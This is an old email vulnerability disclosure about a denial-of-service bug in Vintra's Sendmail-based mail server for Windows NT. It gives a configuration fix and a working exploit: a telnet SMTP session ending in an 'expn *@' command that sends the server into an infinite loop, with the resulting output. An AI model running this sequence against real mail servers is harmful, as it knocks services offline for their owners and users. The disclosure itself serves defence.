`From: Vytis Fedaravicius <[email protected]>
Subject: DOS in Vintra systems Mailserver software.
Hello,
There is a bug in a free MailServer software for Windows NT from Vintra
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause
MTA to go nuts and make CPU ussage up to 99%, eat all available memory and
disk space.
Bug: one opens telnet to 25 port, issues helo, mail from: and rcpt to:
commands, and instead of data command uses expn *@. Softwarre goes in a
infinite loop.
Fix: disable expn command by editing sendmail.cf. Add the folowing line
and restart mta service.
O PrivacyOptions=needmailhelo, noexpn
Exploit (commands to enter are marked ">")
>telnet vulnerable.server.dom 25
220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998
20:18:20 +0200 (Central Europe Daylight Time)
>helo EvilOne
250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet
you
>mail from:bad.boy
250 bad.boy... Sender ok
>rcpt to:resourceLeaker
550 resourceLeaker... User unknown
>expn *@
550 *@... User unknown
550 bad.boy... User unknown
550 bad.boy... User unknown
...hundreds of these lines gets logged and memory is allocated, cpu ussage
increases wildly
550 bad.boy... User unknown
550 bad.boy... User unknown
....
This software is sendmail based, so may be other implementations are
vulnerable also? Vintra systems were notified
Vytis Fedaravicius
System administrator
Omnitel
e-mail: [email protected]
`